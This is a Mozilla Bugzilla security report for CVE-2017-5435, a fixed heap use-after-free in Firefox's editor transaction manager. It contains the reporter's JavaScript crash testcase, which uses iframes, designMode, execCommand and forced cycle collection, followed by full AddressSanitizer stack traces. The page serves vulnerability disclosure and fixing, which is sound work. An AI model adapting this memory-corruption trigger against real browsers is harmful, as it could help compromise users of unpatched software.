Bug 1350683 (CVE-2017-5435)

heap-use-after-free in nsTransactionManager::EndTransaction

VERIFIED FIXED in Firefox -esr45

Status

()

VERIFIED FIXED
2 years ago
a year ago

People

(Reporter: nils, Assigned: smaug)

Tracking

({csectype-uaf, sec-critical})

Trunk
mozilla55
csectype-uaf, sec-critical
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr4553+ verified, firefox52 wontfix, firefox-esr5253+ verified, firefox53+ verified, firefox54+ verified, firefox55+ verified)

Details

(Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage])

Attachments

(1 attachment)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170326014008)

<script>
function start() {
        o1=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o1.addEventListener('load', fun0,false);
        document.body.appendChild(o1);
        o2=window.document;
}
function fun0() {
        o4=o1.contentWindow;
        o5=o1.contentDocument;
        o16=o5.getElementsByTagName('*')[1];
        o81=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o81.src='data:text/html,<div>';
        o16.appendChild(o81);
        o90=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o90.src='data:text/html,<div>';
        o90.addEventListener('load', fun2,false);
        o81.appendChild(o90);
        o1.contentWindow.onresize=fun1;
        o1.height='32px';
        o4.stop();
}
function fun1() {
        o2.designMode='on';
        o2.execCommand('heading',false,'h1');
}
function fun2() {
        o2.designMode='off';
        o4.fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==12221==ERROR: AddressSanitizer: heap-use-after-free on address 0x614000142c60 at pc 0x7f2787ba2430 bp 0x7ffd783787c0 sp 0x7ffd783787b8
READ of size 8 at 0x614000142c60 thread T0 (Web Content)
    #0 0x7f2787ba242f in nsDeque::Pop() /home/worker/workspace/build/src/xpcom/ds/nsDeque.cpp:260:7
    #1 0x7f278de14946 in Pop /home/worker/workspace/build/src/editor/txmgr/nsTransactionStack.cpp:57:58
    #2 0x7f278de14946 in nsTransactionManager::EndTransaction(bool) /home/worker/workspace/build/src/editor/txmgr/nsTransactionManager.cpp:672
    #3 0x7f278de13e29 in nsTransactionManager::DoTransaction(nsITransaction*) /home/worker/workspace/build/src/editor/txmgr/nsTransactionManager.cpp:80:8
    #4 0x7f278dc3fdd4 in mozilla::EditorBase::DoTransaction(nsITransaction*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:737:21
    #5 0x7f278dc6f604 in mozilla::EditorBase::DeleteNode(nsINode*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:1588:41
    #6 0x7f278dc714dc in mozilla::EditorBase::MoveNode(nsIContent*, nsINode*, int) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:1785:17
    #7 0x7f278dd1a78a in mozilla::HTMLEditRules::ApplyBlockStyle(nsTArray<mozilla::OwningNonNull<nsINode> >&, nsIAtom&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:6954:33
    #8 0x7f278dce69e3 in mozilla::HTMLEditRules::WillMakeBasicBlock(mozilla::dom::Selection&, nsAString const&, bool*, bool*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:3593:10
    #9 0x7f278dcce370 in mozilla::HTMLEditRules::WillDoAction(mozilla::dom::Selection*, mozilla::RulesInfo*, bool*, bool*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditRules.cpp:649:14
    #10 0x7f278dd5285f in mozilla::HTMLEditor::InsertBasicBlock(nsAString const&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:2131:24
    #11 0x7f278dd51d36 in mozilla::HTMLEditor::SetParagraphFormat(nsAString const&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:1731:10
    #12 0x7f278de22212 in nsParagraphStateCommand::SetState(nsIEditor*, nsString&) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:648:22
    #13 0x7f278de21671 in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /home/worker/workspace/build/src/editor/composer/nsComposerCommands.cpp:595:12
    #14 0x7f278c0b7f23 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /home/worker/workspace/build/src/dom/commandhandler/nsControllerCommandTable.cpp:162:26
    #15 0x7f278c0aeef3 in DoCommandWithParams /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:152:25
    #16 0x7f278c0aeef3 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:140
    #17 0x7f278c0b50bb in nsCommandManager::DoCommand(char const*, nsICommandParams*, mozIDOMWindowProxy*) /home/worker/workspace/build/src/dom/commandhandler/nsCommandManager.cpp:212:29
    #18 0x7f278c5fa045 in nsHTMLDocument::ExecCommand(nsAString const&, bool, nsAString const&, nsIPrincipal&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:3336:18
    #19 0x7f278bb531ac in mozilla::dom::HTMLDocumentBinding::execCommand(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:835:21
    #20 0x7f278bdf313e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #21 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #22 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #23 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #24 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #25 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #26 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #27 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #28 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #29 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #30 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #31 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #32 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #33 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #34 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #35 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #36 0x7f278b895c95 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #37 0x7f278c1f8c9b in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #38 0x7f278c1f8c9b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #39 0x7f278c1c5022 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:51
    #40 0x7f278c1c6f0f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1296:20
    #41 0x7f278c1b2771 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:466:16
    #42 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #43 0x7f278e227300 in mozilla::PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/PresShell.cpp:2052:5
    #44 0x7f278e23c850 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4139:7
    #45 0x7f278a536c21 in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
    #46 0x7f278a536c21 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8023
    #47 0x7f278a536b18 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8019:22
    #48 0x7f2789529f0b in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:685:14
    #49 0x7f278952c1e2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #50 0x7f278952cf0c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #51 0x7f2787e3f9f2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
    #52 0x7f2787e3bea3 in mozilla::net::nsLoadGroup::Cancel(nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:271:15
    #53 0x7f278952999f in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:245:22
    #54 0x7f278952981c in nsDocLoader::Stop() /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:242:3
    #55 0x7f27906440c9 in Stop /home/worker/workspace/build/src/docshell/base/nsDocShell.h:190:25
    #56 0x7f27906440c9 in nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5566
    #57 0x7f279069f9af in non-virtual thunk to nsDocShell::Stop(unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5530:13
    #58 0x7f278a22700b in nsGlobalWindow::StopOuter(mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7906:22
    #59 0x7f278b604f2c in mozilla::dom::WindowBinding::stop(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:1965:9
    #60 0x7f278b604080 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15658:13
    #61 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #62 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #63 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #64 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #65 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #66 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #67 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #68 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #69 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #70 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #71 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #72 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #73 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #74 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #75 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #76 0x7f278b898b97 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #77 0x7f278c1c4fe8 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #78 0x7f278c1c4fe8 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #79 0x7f278c1c6f0f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1296:20
    #80 0x7f278c1b2771 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:466:16
    #81 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #82 0x7f278a1f32e7 in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3919:7
    #83 0x7f278c1b2867 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:417:12
    #84 0x7f278c1b2867 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:469
    #85 0x7f278c1b2dec in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:519:5
    #86 0x7f278c1b5af8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:827:9
    #87 0x7f278e31182c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #88 0x7f27906b6f49 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
    #89 0x7f27906b31a8 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #90 0x7f27906ba2ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #91 0x7f278952e519 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #92 0x7f278952d4cc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
    #93 0x7f278952a368 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #94 0x7f278952c1e2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #95 0x7f278952cf0c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #96 0x7f2787e3f9f2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
    #97 0x7f278a53dc0b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8879:18
    #98 0x7f278a53d7dc in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8805:9
    #99 0x7f278a51439d in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5279:3
    #100 0x7f278a5df1a2 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #101 0x7f278a5df1a2 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #102 0x7f278a5df1a2 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #103 0x7f2787c5db31 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #104 0x7f2787c8fb30 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #105 0x7f2787c8c578 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #106 0x7f2788a2eed1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #107 0x7f2788990480 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #108 0x7f2788990480 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #109 0x7f2788990480 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #110 0x7f278db3530f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #111 0x7f2791177367 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:871:22
    #112 0x7f2788990480 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #113 0x7f2788990480 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #114 0x7f2788990480 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #115 0x7f2791176d7b in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:695:34
    #116 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #117 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #118 0x7f27a323082f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #119 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)

0x614000142c60 is located 32 bytes inside of 392-byte region [0x614000142c40,0x614000142dc8)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f2787b3c357 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:25
    #2 0x7f2787b3bf57 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f2787b42f7d in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
    #4 0x7f2787b427a1 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
    #5 0x7f2787b45538 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:21
    #6 0x7f278a61bc18 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
    #7 0x7f278a193c5d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7f2787caa1f1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7f278934f784 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7f278934f784 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7f278934f784 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7f278935692c in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #15 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #16 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #17 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #19 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #20 0x7f2791f3f723 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #21 0x7f278929946b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #24 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #25 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #26 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #27 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #28 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #29 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #30 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #31 0x7f27915ac698 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #32 0x7f27915ac698 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #33 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #34 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #35 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #36 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f278dc65a8b in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f278dc65a8b in mozilla::EditorBase::EnableUndo(bool) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:759
